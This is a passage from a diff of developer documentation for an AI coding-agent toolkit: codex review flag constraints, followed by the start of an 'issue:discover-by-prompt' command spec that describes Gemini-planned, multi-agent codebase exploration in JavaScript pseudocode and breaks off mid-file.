### Invalid Commit
|
||||
```bash
|
||||
# Show recent commits
|
||||
git log --oneline -10
|
||||
```
|
||||
|
||||
## Integration Notes
|
||||
|
||||
- Uses `ccw cli --tool codex --mode review` endpoint
|
||||
- Model passed via prompt (codex uses `-c model=` internally)
|
||||
- Target flags (`--uncommitted`, `--base`, `--commit`) passed through to codex
|
||||
- Prompt follows standard ccw cli template format for consistency
|
||||
|
||||
## Validation Constraints
|
||||
|
||||
**IMPORTANT: Target flags and prompt are mutually exclusive**
|
||||
|
||||
The codex CLI has a constraint where target flags (`--uncommitted`, `--base`, `--commit`) cannot be used with a positional `[PROMPT]` argument:
|
||||
|
||||
```
|
||||
error: the argument '--uncommitted' cannot be used with '[PROMPT]'
|
||||
error: the argument '--base <BRANCH>' cannot be used with '[PROMPT]'
|
||||
error: the argument '--commit <SHA>' cannot be used with '[PROMPT]'
|
||||
```
|
||||
|
||||
**Behavior:**
|
||||
- When ANY target flag is specified, ccw cli automatically skips template concatenation (systemRules/roles)
|
||||
- The review uses codex's default review behavior for the specified target
|
||||
- Custom prompts are only supported WITHOUT target flags (reviews uncommitted changes by default)
|
||||
|
||||
**Valid combinations:**
|
||||
| Command | Result |
|
||||
|---------|--------|
|
||||
| `codex review "Focus on security"` | ✓ Custom prompt, reviews uncommitted (default) |
|
||||
| `codex review --uncommitted` | ✓ No prompt, uses default review |
|
||||
| `codex review --base main` | ✓ No prompt, uses default review |
|
||||
| `codex review --commit abc123` | ✓ No prompt, uses default review |
|
||||
| `codex review --uncommitted "prompt"` | ✗ Invalid - mutually exclusive |
|
||||
| `codex review --base main "prompt"` | ✗ Invalid - mutually exclusive |
|
||||
| `codex review --commit abc123 "prompt"` | ✗ Invalid - mutually exclusive |
|
||||
|
||||
**Examples:**
|
||||
```bash
|
||||
# ✓ Valid: prompt only (reviews uncommitted by default)
|
||||
ccw cli -p "Focus on security" --tool codex --mode review
|
||||
|
||||
# ✓ Valid: target flag only (no prompt)
|
||||
ccw cli --tool codex --mode review --uncommitted
|
||||
ccw cli --tool codex --mode review --base main
|
||||
ccw cli --tool codex --mode review --commit abc123
|
||||
|
||||
# ✗ Invalid: target flag with prompt (will fail)
|
||||
ccw cli -p "Review this" --tool codex --mode review --uncommitted
|
||||
ccw cli -p "Review this" --tool codex --mode review --base main
|
||||
ccw cli -p "Review this" --tool codex --mode review --commit abc123
|
||||
```
|
||||
764
.claude/commands/issue/discover-by-prompt.md
Normal file
@@ -0,0 +1,764 @@
|
||||
---
|
||||
name: issue:discover-by-prompt
|
||||
description: Discover issues from user prompt with Gemini-planned iterative multi-agent exploration. Uses ACE semantic search for context gathering and supports cross-module comparison (e.g., frontend vs backend API contracts).
|
||||
argument-hint: "<prompt> [--scope=src/**] [--depth=standard|deep] [--max-iterations=5]"
|
||||
allowed-tools: SlashCommand(*), TodoWrite(*), Read(*), Bash(*), Task(*), AskUserQuestion(*), Glob(*), Grep(*), mcp__ace-tool__search_context(*), mcp__exa__search(*)
|
||||
---
|
||||
|
||||
# Issue Discovery by Prompt
|
||||
|
||||
## Quick Start
|
||||
|
||||
```bash
|
||||
# Discover issues based on user description
|
||||
/issue:discover-by-prompt "Check if frontend API calls match backend implementations"
|
||||
|
||||
# Compare specific modules
|
||||
/issue:discover-by-prompt "Verify auth flow consistency between mobile and web clients" --scope=src/auth/**,src/mobile/**
|
||||
|
||||
# Deep exploration with more iterations
|
||||
/issue:discover-by-prompt "Find all places where error handling is inconsistent" --depth=deep --max-iterations=8
|
||||
|
||||
# Focused backend-frontend contract check
|
||||
/issue:discover-by-prompt "Compare REST API definitions with frontend fetch calls"
|
||||
```
|
||||
|
||||
**Core Difference from `/issue:discover`**:
|
||||
- `discover`: Pre-defined perspectives (bug, security, etc.), parallel execution
|
||||
- `discover-by-prompt`: User-driven prompt, Gemini-planned strategy, iterative exploration
|
||||
|
||||
## What & Why
|
||||
|
||||
### Core Concept
|
||||
|
||||
Prompt-driven issue discovery with intelligent planning. Instead of fixed perspectives, this command:
|
||||
|
||||
1. **Analyzes user intent** via Gemini to understand what to find
|
||||
2. **Plans exploration strategy** dynamically based on codebase structure
|
||||
3. **Executes iterative multi-agent exploration** with feedback loops
|
||||
4. **Performs cross-module comparison** when detecting comparison intent
|
||||
|
||||
### Value Proposition
|
||||
|
||||
1. **Natural Language Input**: Describe what you want to find, not how to find it
|
||||
2. **Intelligent Planning**: Gemini designs optimal exploration strategy
|
||||
3. **Iterative Refinement**: Each round builds on previous discoveries
|
||||
4. **Cross-Module Analysis**: Compare frontend/backend, mobile/web, old/new implementations
|
||||
5. **Adaptive Exploration**: Adjusts direction based on findings
|
||||
|
||||
### Use Cases
|
||||
|
||||
| Scenario | Example Prompt |
|
||||
|----------|----------------|
|
||||
| API Contract | "Check if frontend calls match backend endpoints" |
|
||||
| Error Handling | "Find inconsistent error handling patterns" |
|
||||
| Migration Gap | "Compare old auth with new auth implementation" |
|
||||
| Feature Parity | "Verify mobile has all web features" |
|
||||
| Schema Drift | "Check if TypeScript types match API responses" |
|
||||
| Integration | "Find mismatches between service A and service B" |
|
||||
|
||||
## How It Works
|
||||
|
||||
### Execution Flow
|
||||
|
||||
```
|
||||
Phase 1: Prompt Analysis & Initialization
|
||||
├─ Parse user prompt and flags
|
||||
├─ Detect exploration intent (comparison/search/verification)
|
||||
└─ Initialize discovery session
|
||||
|
||||
Phase 1.5: ACE Context Gathering
|
||||
├─ Use ACE semantic search to understand codebase structure
|
||||
├─ Identify relevant modules based on prompt keywords
|
||||
├─ Collect architecture context for Gemini planning
|
||||
└─ Build initial context package
|
||||
|
||||
Phase 2: Gemini Strategy Planning
|
||||
├─ Feed ACE context + prompt to Gemini CLI
|
||||
├─ Gemini analyzes and generates exploration strategy
|
||||
├─ Create exploration dimensions with search targets
|
||||
├─ Define comparison matrix (if comparison intent)
|
||||
└─ Set success criteria and iteration limits
|
||||
|
||||
Phase 3: Iterative Agent Exploration (with ACE)
|
||||
├─ Iteration 1: Initial exploration by assigned agents
|
||||
│ ├─ Agent A: ACE search + explore dimension 1
|
||||
│ ├─ Agent B: ACE search + explore dimension 2
|
||||
│ └─ Collect findings, update shared context
|
||||
├─ Iteration 2-N: Refined exploration
|
||||
│ ├─ Analyze previous findings
|
||||
│ ├─ ACE search for related code paths
|
||||
│ ├─ Execute targeted exploration
|
||||
│ └─ Update cumulative findings
|
||||
└─ Termination: Max iterations or convergence
|
||||
|
||||
Phase 4: Cross-Analysis & Synthesis
|
||||
├─ Compare findings across dimensions
|
||||
├─ Identify discrepancies and issues
|
||||
├─ Calculate confidence scores
|
||||
└─ Generate issue candidates
|
||||
|
||||
Phase 5: Issue Generation & Summary
|
||||
├─ Convert findings to issue format
|
||||
├─ Write discovery outputs
|
||||
└─ Prompt user for next action
|
||||
```
|
||||
|
||||
### Exploration Dimensions
|
||||
|
||||
Dimensions are **dynamically generated by Gemini** from the user prompt and are not limited to predefined categories.
|
||||
|
||||
**Examples**:
|
||||
|
||||
| Prompt | Generated Dimensions |
|
||||
|--------|---------------------|
|
||||
| "Check API contracts" | frontend-calls, backend-handlers |
|
||||
| "Find auth issues" | auth-module (single dimension) |
|
||||
| "Compare old/new implementations" | legacy-code, new-code |
|
||||
| "Audit payment flow" | payment-service, validation, logging |
|
||||
| "Find error handling gaps" | error-handlers, error-types, recovery-logic |
|
||||
|
||||
Gemini analyzes the prompt + ACE context to determine:
|
||||
- How many dimensions are needed (1 to N)
|
||||
- What each dimension should focus on
|
||||
- Whether comparison is needed between dimensions
|
||||
|
||||
### Iteration Strategy
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────┐
|
||||
│ Iteration Loop │
|
||||
├─────────────────────────────────────────────────────────────┤
|
||||
│ 1. Plan: What to explore this iteration │
|
||||
│ └─ Based on: previous findings + unexplored areas │
|
||||
│ │
|
||||
│ 2. Execute: Launch agents for this iteration │
|
||||
│ └─ Each agent: explore → collect → return summary │
|
||||
│ │
|
||||
│ 3. Analyze: Process iteration results │
|
||||
│ └─ New findings? Gaps? Contradictions? │
|
||||
│ │
|
||||
│ 4. Decide: Continue or terminate │
|
||||
│ └─ Terminate if: max iterations OR convergence OR │
|
||||
│ high confidence on all questions │
|
||||
└─────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Core Responsibilities
|
||||
|
||||
### Phase 1: Prompt Analysis & Initialization
|
||||
|
||||
```javascript
|
||||
// Step 1: Parse arguments
|
||||
const { prompt, scope, depth, maxIterations } = parseArgs(args);
|
||||
|
||||
// Step 2: Generate discovery ID
|
||||
const discoveryId = `DBP-${formatDate(new Date(), 'YYYYMMDD-HHmmss')}`;
|
||||
|
||||
// Step 3: Create output directory
|
||||
const outputDir = `.workflow/issues/discoveries/${discoveryId}`;
|
||||
await mkdir(outputDir, { recursive: true });
|
||||
await mkdir(`${outputDir}/iterations`, { recursive: true });
|
||||
|
||||
// Step 4: Detect intent type from prompt
|
||||
const intentType = detectIntent(prompt);
|
||||
// Returns: 'comparison' | 'search' | 'verification' | 'audit'
|
||||
|
||||
// Step 5: Initialize discovery state
|
||||
await writeJson(`${outputDir}/discovery-state.json`, {
|
||||
discovery_id: discoveryId,
|
||||
type: 'prompt-driven',
|
||||
prompt: prompt,
|
||||
intent_type: intentType,
|
||||
scope: scope || '**/*',
|
||||
depth: depth || 'standard',
|
||||
max_iterations: maxIterations || 5,
|
||||
phase: 'initialization',
|
||||
created_at: new Date().toISOString(),
|
||||
iterations: [],
|
||||
cumulative_findings: [],
|
||||
comparison_matrix: null // filled for comparison intent
|
||||
});
|
||||
```
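
`detectIntent` is not prescribed here; a minimal keyword heuristic along these lines would satisfy the contract (illustrative only — real implementations may use Gemini itself for intent classification):

```javascript
// Sketch: naive keyword heuristic for intent detection
function detectIntent(prompt) {
  const p = prompt.toLowerCase();
  if (/\b(compare|match|versus|vs\.?|consistency between|mismatch)\b/.test(p)) return 'comparison';
  if (/\b(verify|check if|ensure|confirm)\b/.test(p))                          return 'verification';
  if (/\b(audit|review all|scan)\b/.test(p))                                   return 'audit';
  return 'search'; // default: open-ended discovery
}
```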
|
||||
|
||||
### Phase 1.5: ACE Context Gathering
|
||||
|
||||
**Purpose**: Use ACE semantic search to gather codebase context before Gemini planning.
|
||||
|
||||
```javascript
|
||||
// Step 1: Extract keywords from prompt for semantic search
|
||||
const keywords = extractKeywords(prompt);
|
||||
// e.g., "frontend API calls match backend" → ["frontend", "API", "backend", "endpoints"]
|
||||
|
||||
// Step 2: Use ACE to understand codebase structure
|
||||
const aceQueries = [
|
||||
`Project architecture and module structure for ${keywords.join(', ')}`,
|
||||
`Where are ${keywords[0]} implementations located?`,
|
||||
`How does ${keywords.slice(0, 2).join(' ')} work in this codebase?`
|
||||
];
|
||||
|
||||
const aceResults = [];
|
||||
for (const query of aceQueries) {
|
||||
const result = await mcp__ace-tool__search_context({
|
||||
project_root_path: process.cwd(),
|
||||
query: query
|
||||
});
|
||||
aceResults.push({ query, result });
|
||||
}
|
||||
|
||||
// Step 3: Build context package for Gemini (kept in memory)
|
||||
const aceContext = {
|
||||
prompt_keywords: keywords,
|
||||
codebase_structure: aceResults[0].result,
|
||||
relevant_modules: aceResults.slice(1).map(r => r.result),
|
||||
detected_patterns: extractPatterns(aceResults)
|
||||
};
|
||||
|
||||
// Step 4: Update state (no separate file)
|
||||
await updateDiscoveryState(outputDir, {
|
||||
phase: 'context-gathered',
|
||||
ace_context: {
|
||||
queries_executed: aceQueries.length,
|
||||
modules_identified: aceContext.relevant_modules.length
|
||||
}
|
||||
});
|
||||
|
||||
// aceContext passed to Phase 2 in memory
|
||||
```
|
||||
|
||||
**ACE Query Strategy by Intent Type**:
|
||||
|
||||
| Intent | ACE Queries |
|
||||
|--------|-------------|
|
||||
| **comparison** | "frontend API calls", "backend API handlers", "API contract definitions" |
|
||||
| **search** | "{keyword} implementations", "{keyword} usage patterns" |
|
||||
| **verification** | "expected behavior for {feature}", "test coverage for {feature}" |
|
||||
| **audit** | "all {category} patterns", "{category} security concerns" |
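
A sketch of how `extractKeywords` and the per-intent query templates above could be combined (the helper names and stopword list are illustrative):

```javascript
// Sketch: keyword extraction + intent-specific ACE query construction
function extractKeywords(prompt) {
  const stopwords = new Set(['check', 'if', 'the', 'all', 'and', 'are', 'with', 'between', 'find', 'match']);
  return prompt.toLowerCase()
    .split(/\W+/)
    .filter(w => w.length > 2 && !stopwords.has(w));
}

function buildAceQueries(intentType, keywords) {
  switch (intentType) {
    case 'comparison':
      return [`${keywords[0]} API calls`, `${keywords[1] || keywords[0]} handlers`, 'API contract definitions'];
    case 'verification':
      return [`expected behavior for ${keywords.join(' ')}`, `test coverage for ${keywords[0]}`];
    case 'audit':
      return [`all ${keywords[0]} patterns`, `${keywords[0]} security concerns`];
    default: // search
      return [`${keywords[0]} implementations`, `${keywords[0]} usage patterns`];
  }
}
```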
|
||||
|
||||
### Phase 2: Gemini Strategy Planning
|
||||
|
||||
**Purpose**: Gemini analyzes user prompt + ACE context to design optimal exploration strategy.
|
||||
|
||||
```javascript
|
||||
// Step 1: Use ACE context gathered in Phase 1.5 (passed in memory, not persisted to disk)
|
||||
// aceContext is already in scope from Phase 1.5 — no file read needed
|
||||
|
||||
// Step 2: Build Gemini planning prompt with ACE context
|
||||
const planningPrompt = `
|
||||
PURPOSE: Analyze discovery prompt and create exploration strategy based on codebase context
|
||||
TASK:
|
||||
• Parse user intent from prompt: "${prompt}"
|
||||
• Use codebase context to identify specific modules and files to explore
|
||||
• Create exploration dimensions with precise search targets
|
||||
• Define comparison matrix structure (if comparison intent)
|
||||
• Set success criteria and iteration strategy
|
||||
MODE: analysis
|
||||
CONTEXT: @${scope || '**/*'} | Discovery type: ${intentType}
|
||||
|
||||
## Codebase Context (from ACE semantic search)
|
||||
${JSON.stringify(aceContext, null, 2)}
|
||||
|
||||
EXPECTED: JSON exploration plan following exploration-plan-schema.json:
|
||||
{
|
||||
"intent_analysis": { "type": "${intentType}", "primary_question": "...", "sub_questions": [...] },
|
||||
"dimensions": [{ "name": "...", "description": "...", "search_targets": [...], "focus_areas": [...], "agent_prompt": "..." }],
|
||||
"comparison_matrix": { "dimension_a": "...", "dimension_b": "...", "comparison_points": [...] },
|
||||
"success_criteria": [...],
|
||||
"estimated_iterations": N,
|
||||
"termination_conditions": [...]
|
||||
}
|
||||
CONSTRAINTS: Use ACE context to inform targets | Focus on actionable plan
|
||||
`;
|
||||
|
||||
// Step 3: Execute Gemini planning
|
||||
Bash({
|
||||
command: `ccw cli -p "${planningPrompt}" --tool gemini --mode analysis`,
|
||||
run_in_background: true,
|
||||
timeout: 300000
|
||||
});
|
||||
|
||||
// Step 4: Once the background CLI call completes, parse Gemini output and validate against schema
|
||||
const explorationPlan = await parseGeminiPlanOutput(geminiResult);
|
||||
validateAgainstSchema(explorationPlan, 'exploration-plan-schema.json');
|
||||
|
||||
// Step 5: Enhance plan with ACE-discovered file paths
|
||||
explorationPlan.dimensions = explorationPlan.dimensions.map(dim => ({
|
||||
...dim,
|
||||
ace_suggested_files: aceContext.relevant_modules
|
||||
.filter(m => m.relevance_to === dim.name)
|
||||
.map(m => m.file_path)
|
||||
}));
|
||||
|
||||
// Step 6: Update state (plan kept in memory, not persisted)
|
||||
await updateDiscoveryState(outputDir, {
|
||||
phase: 'planned',
|
||||
exploration_plan: {
|
||||
dimensions_count: explorationPlan.dimensions.length,
|
||||
has_comparison_matrix: !!explorationPlan.comparison_matrix,
|
||||
estimated_iterations: explorationPlan.estimated_iterations
|
||||
}
|
||||
});
|
||||
|
||||
// explorationPlan passed to Phase 3 in memory
|
||||
```
|
||||
|
||||
**Gemini Planning Responsibilities**:
|
||||
|
||||
| Responsibility | Input | Output |
|
||||
|----------------|-------|--------|
|
||||
| Intent Analysis | User prompt | type, primary_question, sub_questions |
|
||||
| Dimension Design | ACE context + prompt | dimensions with search_targets |
|
||||
| Comparison Matrix | Intent type + modules | comparison_points (if applicable) |
|
||||
| Iteration Strategy | Depth setting | estimated_iterations, termination_conditions |
|
||||
|
||||
**Gemini Planning Output Schema**:
|
||||
|
||||
```json
|
||||
{
|
||||
"intent_analysis": {
|
||||
"type": "comparison|search|verification|audit",
|
||||
"primary_question": "string",
|
||||
"sub_questions": ["string"]
|
||||
},
|
||||
"dimensions": [
|
||||
{
|
||||
"name": "frontend",
|
||||
"description": "Client-side API calls and error handling",
|
||||
"search_targets": ["src/api/**", "src/hooks/**"],
|
||||
"focus_areas": ["fetch calls", "error boundaries", "response parsing"],
|
||||
"agent_prompt": "Explore frontend API consumption patterns..."
|
||||
},
|
||||
{
|
||||
"name": "backend",
|
||||
"description": "Server-side API implementations",
|
||||
"search_targets": ["src/server/**", "src/routes/**"],
|
||||
"focus_areas": ["endpoint handlers", "response schemas", "error responses"],
|
||||
"agent_prompt": "Explore backend API implementations..."
|
||||
}
|
||||
],
|
||||
"comparison_matrix": {
|
||||
"dimension_a": "frontend",
|
||||
"dimension_b": "backend",
|
||||
"comparison_points": [
|
||||
{"aspect": "endpoints", "frontend_check": "fetch URLs", "backend_check": "route paths"},
|
||||
{"aspect": "methods", "frontend_check": "HTTP methods used", "backend_check": "methods accepted"},
|
||||
{"aspect": "payloads", "frontend_check": "request body structure", "backend_check": "expected schema"},
|
||||
{"aspect": "responses", "frontend_check": "response parsing", "backend_check": "response format"},
|
||||
{"aspect": "errors", "frontend_check": "error handling", "backend_check": "error responses"}
|
||||
]
|
||||
},
|
||||
"success_criteria": [
|
||||
"All API endpoints mapped between frontend and backend",
|
||||
"Discrepancies identified with file:line references",
|
||||
"Each finding includes remediation suggestion"
|
||||
],
|
||||
"estimated_iterations": 3,
|
||||
"termination_conditions": [
|
||||
"All comparison points verified",
|
||||
"No new findings in last iteration",
|
||||
"Confidence > 0.8 on primary question"
|
||||
]
|
||||
}
|
||||
```
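
`validateAgainstSchema` can be as simple as a required-key check against the structure above before accepting the Gemini output (a sketch; a full JSON Schema validator would also work):

```javascript
// Sketch: lightweight structural validation of the Gemini exploration plan
function validateExplorationPlan(plan) {
  const errors = [];
  if (!plan.intent_analysis?.primary_question) errors.push('missing intent_analysis.primary_question');
  if (!Array.isArray(plan.dimensions) || plan.dimensions.length === 0) errors.push('dimensions must be a non-empty array');
  for (const dim of plan.dimensions || []) {
    if (!dim.name || !Array.isArray(dim.search_targets)) errors.push(`dimension "${dim.name || '?'}" is incomplete`);
  }
  if (plan.intent_analysis?.type === 'comparison' && !plan.comparison_matrix) {
    errors.push('comparison intent requires comparison_matrix');
  }
  if (errors.length) throw new Error(`Invalid exploration plan: ${errors.join('; ')}`);
  return plan;
}
```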
|
||||
|
||||
### Phase 3: Iterative Agent Exploration (with ACE)
|
||||
|
||||
**Purpose**: Multi-agent iterative exploration using ACE for semantic search within each iteration.
|
||||
|
||||
```javascript
|
||||
let iteration = 0;
|
||||
let cumulativeFindings = [];
|
||||
let sharedContext = { aceDiscoveries: [], crossReferences: [] };
|
||||
let shouldContinue = true;
|
||||
|
||||
while (shouldContinue && iteration < maxIterations) {
|
||||
iteration++;
|
||||
const iterationDir = `${outputDir}/iterations/${iteration}`;
|
||||
await mkdir(iterationDir, { recursive: true });
|
||||
|
||||
// Step 1: ACE-assisted iteration planning
|
||||
// Use previous findings to guide ACE queries for this iteration
|
||||
const iterationAceQueries = iteration === 1
|
||||
? explorationPlan.dimensions.map(d => d.focus_areas[0]) // Initial queries from plan
|
||||
: deriveQueriesFromFindings(cumulativeFindings); // Follow-up queries from findings
|
||||
|
||||
// Execute ACE searches to find related code
|
||||
const iterationAceResults = [];
|
||||
for (const query of iterationAceQueries) {
|
||||
const result = await mcp__ace-tool__search_context({
|
||||
project_root_path: process.cwd(),
|
||||
    query: `${query} in ${scope || '**/*'}`  // use the --scope flag parsed in Phase 1
|
||||
});
|
||||
iterationAceResults.push({ query, result });
|
||||
}
|
||||
|
||||
// Update shared context with ACE discoveries
|
||||
sharedContext.aceDiscoveries.push(...iterationAceResults);
|
||||
|
||||
// Step 2: Plan this iteration based on ACE results
|
||||
const iterationPlan = planIteration(iteration, explorationPlan, cumulativeFindings, iterationAceResults);
|
||||
|
||||
// Step 3: Launch dimension agents with ACE context
|
||||
const agentPromises = iterationPlan.dimensions.map(dimension =>
|
||||
Task({
|
||||
subagent_type: "cli-explore-agent",
|
||||
run_in_background: false,
|
||||
description: `Explore ${dimension.name} (iteration ${iteration})`,
|
||||
prompt: buildDimensionPromptWithACE(dimension, iteration, cumulativeFindings, iterationAceResults, iterationDir)
|
||||
})
|
||||
);
|
||||
|
||||
// Wait for iteration agents
|
||||
const iterationResults = await Promise.all(agentPromises);
|
||||
|
||||
// Step 4: Collect and analyze iteration findings
|
||||
const iterationFindings = await collectIterationFindings(iterationDir, iterationPlan.dimensions);
|
||||
|
||||
// Step 5: Cross-reference findings between dimensions
|
||||
if (iterationPlan.dimensions.length > 1) {
|
||||
const crossRefs = findCrossReferences(iterationFindings, iterationPlan.dimensions);
|
||||
sharedContext.crossReferences.push(...crossRefs);
|
||||
}
|
||||
|
||||
cumulativeFindings.push(...iterationFindings);
|
||||
|
||||
// Step 6: Decide whether to continue
|
||||
const convergenceCheck = checkConvergence(iterationFindings, cumulativeFindings, explorationPlan);
|
||||
shouldContinue = !convergenceCheck.converged;
|
||||
|
||||
// Step 7: Update state (iteration summary embedded in state)
|
||||
await updateDiscoveryState(outputDir, {
|
||||
iterations: [...state.iterations, {
|
||||
number: iteration,
|
||||
findings_count: iterationFindings.length,
|
||||
ace_queries: iterationAceQueries.length,
|
||||
cross_references: sharedContext.crossReferences.length,
|
||||
new_discoveries: convergenceCheck.newDiscoveries,
|
||||
confidence: convergenceCheck.confidence,
|
||||
continued: shouldContinue
|
||||
}],
|
||||
cumulative_findings: cumulativeFindings
|
||||
});
|
||||
}
|
||||
```
|
||||
|
||||
**ACE in Iteration Loop**:
|
||||
|
||||
```
|
||||
Iteration N
|
||||
│
|
||||
├─→ ACE Search (based on previous findings)
|
||||
│ └─ Query: "related code paths for {finding.category}"
|
||||
│ └─ Result: Additional files to explore
|
||||
│
|
||||
├─→ Agent Exploration (with ACE context)
|
||||
│ └─ Agent receives: dimension targets + ACE suggestions
|
||||
│ └─ Agent can call ACE for deeper search
|
||||
│
|
||||
├─→ Cross-Reference Analysis
|
||||
│ └─ Compare findings between dimensions
|
||||
│ └─ Identify discrepancies
|
||||
│
|
||||
└─→ Convergence Check
|
||||
└─ New findings? Continue
|
||||
└─ No new findings? Terminate
|
||||
```
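
`checkConvergence` is left to the implementation; the termination rules above translate roughly to the following sketch (the 0.8 confidence threshold mirrors the plan's termination conditions and is only a proxy for "high confidence on the primary question"):

```javascript
// Sketch: terminate when an iteration stops producing new findings or confidence is high enough
function checkConvergence(iterationFindings, cumulativeFindings, plan) {
  const newDiscoveries = iterationFindings.length;
  const avgConfidence = cumulativeFindings.length
    ? cumulativeFindings.reduce((sum, f) => sum + (f.confidence || 0), 0) / cumulativeFindings.length
    : 0;

  const converged =
    newDiscoveries === 0 ||   // no new findings this iteration
    avgConfidence >= 0.8;     // proxy for high confidence on the primary question

  return { converged, newDiscoveries, confidence: avgConfidence };
}
```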
|
||||
|
||||
**Dimension Agent Prompt Template (with ACE)**:
|
||||
|
||||
```javascript
|
||||
function buildDimensionPromptWithACE(dimension, iteration, previousFindings, aceResults, outputDir) {
|
||||
// Filter ACE results relevant to this dimension
|
||||
const relevantAceResults = aceResults.filter(r =>
|
||||
r.query.includes(dimension.name) || dimension.focus_areas.some(fa => r.query.includes(fa))
|
||||
);
|
||||
|
||||
return `
|
||||
## Task Objective
|
||||
Explore ${dimension.name} dimension for issue discovery (Iteration ${iteration})
|
||||
|
||||
## Context
|
||||
- Dimension: ${dimension.name}
|
||||
- Description: ${dimension.description}
|
||||
- Search Targets: ${dimension.search_targets.join(', ')}
|
||||
- Focus Areas: ${dimension.focus_areas.join(', ')}
|
||||
|
||||
## ACE Semantic Search Results (Pre-gathered)
|
||||
The following files/code sections were identified by ACE as relevant to this dimension:
|
||||
${JSON.stringify(relevantAceResults.map(r => ({ query: r.query, files: r.result.slice(0, 5) })), null, 2)}
|
||||
|
||||
**Use ACE for deeper exploration**: You have access to mcp__ace-tool__search_context.
|
||||
When you find something interesting, use ACE to find related code:
|
||||
- mcp__ace-tool__search_context({ project_root_path: ".", query: "related to {finding}" })
|
||||
|
||||
${iteration > 1 ? `
|
||||
## Previous Findings to Build Upon
|
||||
${summarizePreviousFindings(previousFindings, dimension.name)}
|
||||
|
||||
## This Iteration Focus
|
||||
- Explore areas not yet covered (check ACE results for new files)
|
||||
- Verify/deepen previous findings
|
||||
- Follow leads from previous discoveries
|
||||
- Use ACE to find cross-references between dimensions
|
||||
` : ''}
|
||||
|
||||
## MANDATORY FIRST STEPS
|
||||
1. Review the exploration plan details provided in this prompt (the plan is kept in memory, not written to disk)
|
||||
2. Read schema: ~/.claude/workflows/cli-templates/schemas/discovery-finding-schema.json
|
||||
3. Review ACE results above for starting points
|
||||
4. Explore files identified by ACE
|
||||
|
||||
## Exploration Instructions
|
||||
${dimension.agent_prompt}
|
||||
|
||||
## ACE Usage Guidelines
|
||||
- Use ACE when you need to find:
|
||||
- Where a function/class is used
|
||||
- Related implementations in other modules
|
||||
- Cross-module dependencies
|
||||
- Similar patterns elsewhere in codebase
|
||||
- Query format: Natural language, be specific
|
||||
- Example: "Where is UserService.authenticate called from?"
|
||||
|
||||
## Output Requirements
|
||||
|
||||
**1. Write JSON file**: ${outputDir}/${dimension.name}.json
|
||||
Follow discovery-finding-schema.json:
|
||||
- findings: [{id, title, category, description, file, line, snippet, confidence, related_dimension}]
|
||||
- coverage: {files_explored, areas_covered, areas_remaining}
|
||||
- leads: [{description, suggested_search}] // for next iteration
|
||||
- ace_queries_used: [{query, result_count}] // track ACE usage
|
||||
|
||||
**2. Return summary**:
|
||||
- Total findings this iteration
|
||||
- Key discoveries
|
||||
- ACE queries that revealed important code
|
||||
- Recommended next exploration areas
|
||||
|
||||
## Success Criteria
|
||||
- [ ] JSON written to ${outputDir}/${dimension.name}.json
|
||||
- [ ] Each finding has file:line reference
|
||||
- [ ] ACE used for cross-references where applicable
|
||||
- [ ] Coverage report included
|
||||
- [ ] Leads for next iteration identified
|
||||
`;
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 4: Cross-Analysis & Synthesis
|
||||
|
||||
```javascript
|
||||
// For comparison intent, perform cross-analysis
|
||||
if (intentType === 'comparison' && explorationPlan.comparison_matrix) {
|
||||
const comparisonResults = [];
|
||||
|
||||
for (const point of explorationPlan.comparison_matrix.comparison_points) {
|
||||
const dimensionAFindings = cumulativeFindings.filter(f =>
|
||||
f.related_dimension === explorationPlan.comparison_matrix.dimension_a &&
|
||||
f.category.includes(point.aspect)
|
||||
);
|
||||
|
||||
const dimensionBFindings = cumulativeFindings.filter(f =>
|
||||
f.related_dimension === explorationPlan.comparison_matrix.dimension_b &&
|
||||
f.category.includes(point.aspect)
|
||||
);
|
||||
|
||||
// Compare and find discrepancies
|
||||
const discrepancies = findDiscrepancies(dimensionAFindings, dimensionBFindings, point);
|
||||
|
||||
comparisonResults.push({
|
||||
aspect: point.aspect,
|
||||
dimension_a_count: dimensionAFindings.length,
|
||||
dimension_b_count: dimensionBFindings.length,
|
||||
discrepancies: discrepancies,
|
||||
match_rate: calculateMatchRate(dimensionAFindings, dimensionBFindings)
|
||||
});
|
||||
}
|
||||
|
||||
// Write comparison analysis
|
||||
await writeJson(`${outputDir}/comparison-analysis.json`, {
|
||||
matrix: explorationPlan.comparison_matrix,
|
||||
results: comparisonResults,
|
||||
summary: {
|
||||
total_discrepancies: comparisonResults.reduce((sum, r) => sum + r.discrepancies.length, 0),
|
||||
overall_match_rate: average(comparisonResults.map(r => r.match_rate)),
|
||||
critical_mismatches: comparisonResults.filter(r => r.match_rate < 0.5)
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
// Prioritize all findings
|
||||
const prioritizedFindings = prioritizeFindings(cumulativeFindings, explorationPlan);
|
||||
```
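
`findDiscrepancies` and `calculateMatchRate` are deliberately unspecified; one simple interpretation matches findings by title (a sketch — real matching will likely need endpoint/path normalization per comparison aspect):

```javascript
// Sketch: naive discrepancy detection between two dimensions for one comparison point
function findDiscrepancies(aFindings, bFindings, point) {
  const keyOf = f => (f.title || '').toLowerCase();   // crude matching key
  const bKeys = new Set(bFindings.map(keyOf));
  return aFindings
    .filter(f => !bKeys.has(keyOf(f)))
    .map(f => ({ aspect: point.aspect, missing_in: 'dimension_b', finding: f.id, file: f.file, line: f.line }));
}

function calculateMatchRate(aFindings, bFindings) {
  if (aFindings.length === 0) return 1;               // nothing to match
  const bKeys = new Set(bFindings.map(f => (f.title || '').toLowerCase()));
  const matched = aFindings.filter(f => bKeys.has((f.title || '').toLowerCase())).length;
  return matched / aFindings.length;
}
```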
|
||||
|
||||
### Phase 5: Issue Generation & Summary
|
||||
|
||||
```javascript
|
||||
// Convert high-confidence findings to issues
|
||||
const issueWorthy = prioritizedFindings.filter(f =>
|
||||
f.confidence >= 0.7 || f.priority === 'critical' || f.priority === 'high'
|
||||
);
|
||||
|
||||
const issues = issueWorthy.map(finding => ({
|
||||
id: `ISS-${discoveryId}-${finding.id}`,
|
||||
title: finding.title,
|
||||
description: finding.description,
|
||||
source: {
|
||||
discovery_id: discoveryId,
|
||||
finding_id: finding.id,
|
||||
dimension: finding.related_dimension
|
||||
},
|
||||
file: finding.file,
|
||||
line: finding.line,
|
||||
priority: finding.priority,
|
||||
category: finding.category,
|
||||
suggested_fix: finding.suggested_fix,
|
||||
confidence: finding.confidence,
|
||||
status: 'discovered',
|
||||
created_at: new Date().toISOString()
|
||||
}));
|
||||
|
||||
// Write issues
|
||||
